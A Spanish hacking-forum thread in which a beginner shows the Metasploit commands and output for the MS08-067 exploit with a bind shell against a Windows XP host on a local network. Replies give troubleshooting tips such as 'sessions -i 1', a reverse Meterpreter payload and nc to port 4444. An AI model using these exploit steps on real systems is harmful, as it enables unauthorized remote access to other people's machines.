Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: marcucho en 21 Julio 2010, 12:45 pm


Título: Problema Metasploit
Publicado por: marcucho en 21 Julio 2010, 12:45 pm
Hola a todos.
Tengo un pequeño problema con metasploit, realizo los siguiente para obtener una shell

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.53
RHOST => 192.168.1.53
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.53     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The listen port
   RHOST     192.168.1.53     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

Dándome como resultado el siguiente:

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Attempting to trigger the vulnerability...
  • Sending stage (240 bytes) to 192.168.1.53
  • Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010



Pero se queda hay no me aparece la shell, es decir,


Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>



No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

Espero vuestra contestación y gracias de antemano.

Título: Re: Problema Metasploit
Publicado por: kamsky en 21 Julio 2010, 13:03 pm
haz un nmap al puerto 4444 al pc víctima a ver que dice...

Título: Re: Problema Metasploit
Publicado por: Søra en 21 Julio 2010, 13:21 pm
usa el payload reverse meterpreter tcp y luego sessions -l y veras la sesiones activas que sera una la que acabas de conseguir asi que sessions y el numero y ya esta la shell del meterpreter q aunq sea diferente tiene mas opciones por ejemplo upload para subir archivos....


Saludos Søra

Título: Re: Problema Metasploit
Publicado por: Debci en 21 Julio 2010, 17:35 pm
Porque aun no has mirado las sessiones?
Cuando las mires haz:

sessions -i (de interactuar xD) numSession

En tu caso quedaria algo asi:
Código:
sessions -i 1

Y obtendrias la shell remota :)

Título: Re: Problema Metasploit
Publicado por: wACtOr en 21 Julio 2010, 17:37 pm
ummm

Citar
Pero se queda hay no me aparece la shell, es decir,


Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>



No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

Espero vuestra contestación y gracias de antemano.


Ya tienes la shell. Por lo que veo estas usando ubuntu y tras lanzar el exploit te aparece:
C:\WINDOWS\System32> 

Pues ya tienes la shell del pc victima :S



no??

Título: Re: Problema Metasploit
Publicado por: marcucho en 21 Julio 2010, 18:05 pm
Es que ese es el problema que se queda en blanco, no aparece esto:

C:\WINDOWS\system32>

Cuando da el ok que todo lo ha hecho bien, esto
--------------------------------------------------------------------------------------

*Started bind handler
*Automatically detecting the target...
*Fingerprint: Windows XP Service Pack 3 - lang:Spanish
*Selected Target: Windows XP SP3 Spanish (NX)
*Attempting to trigger the vulnerability...
*Sending stage (240 bytes) to 192.168.1.53
*Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010


-----------------------------------------------------------------------------------------------


Después debe tardar unos segundo o milésimas en aparece C:\WINDOWS\system32>
bueno pues a mi no me aparece, y yo me quedo esperando 10 minutos y no aparece, y cual es el problema que no puedo hacer:

sessions -i 1

porque tampoco aparece msf >, se queda en blanco, no se si es que da algún error interno que no muestra, se queda como colgado lo único que me queda es ctrl + c y claro cierra sesión.

Gracias a todos por contestar.

Título: Re: Problema Metasploit
Publicado por: Debci en 21 Julio 2010, 18:52 pm
prueba a hacer nc al 4444 de la victima y probablemente obtengas la shell :)

Saludos

Título: Re: Problema Metasploit
Publicado por: wACtOr en 21 Julio 2010, 18:57 pm
por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.

Título: Re: Problema Metasploit
Publicado por: Debci en 21 Julio 2010, 20:08 pm
Cita de: wACtOr en 21 Julio 2010, 18:57 pm
por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.
Si no quieres muchos problemas prueba Backtrack4 xD

Saludos

Título: Re: Problema Metasploit
Publicado por: [L]ord [R]NA en 24 Julio 2010, 00:06 am
Cita de: wACtOr en 21 Julio 2010, 18:57 pm
por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.
+1, las veces que lo he instalado lo hago desde SVN

Título: Re: Problema Metasploit
Publicado por: snake_girls en 8 Mayo 2012, 02:38 am
Hola disculpen por revivir este post pero tengo un problema similar, tengo backtrack 5 , normalmente me funcionaba bien el metasploit framework, luego que lo actualize me tira error cuando lo invoco con:  msfconsole


/opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:14:in `require': no such file to load -- racket (LoadError)
   from /opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:14:in `<module:Ipv6>'
   from /opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:12:in `<module:Msf>'
   from /opt/framework3/msf3/lib/msf/core/exploit/ipv6.rb:5:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/core/exploit/mixins.rb:30:in `require'
   from /opt/framework3/msf3/lib/msf/core/exploit/mixins.rb:30:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:217:in `require'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:217:in `<class:Exploit>'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:29:in `<module:Msf>'
   from /opt/framework3/msf3/lib/msf/core/exploit.rb:4:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/core.rb:52:in `require'
   from /opt/framework3/msf3/lib/msf/core.rb:52:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/ui/console/driver.rb:1:in `require'
   from /opt/framework3/msf3/lib/msf/ui/console/driver.rb:1:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/ui/console.rb:10:in `require'
   from /opt/framework3/msf3/lib/msf/ui/console.rb:10:in `<top (required)>'
   from /opt/framework3/msf3/lib/msf/ui.rb:10:in `require'
   from /opt/framework3/msf3/lib/msf/ui.rb:10:in `<top (required)>'
   from /opt/framework3/msf3/msfconsole:118:in `require'
   from /opt/framework3/msf3/msfconsole:118:in `<main>'
root@bt:~#
 me pueden orientar referente a este error? que puedo hacer... gracias


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines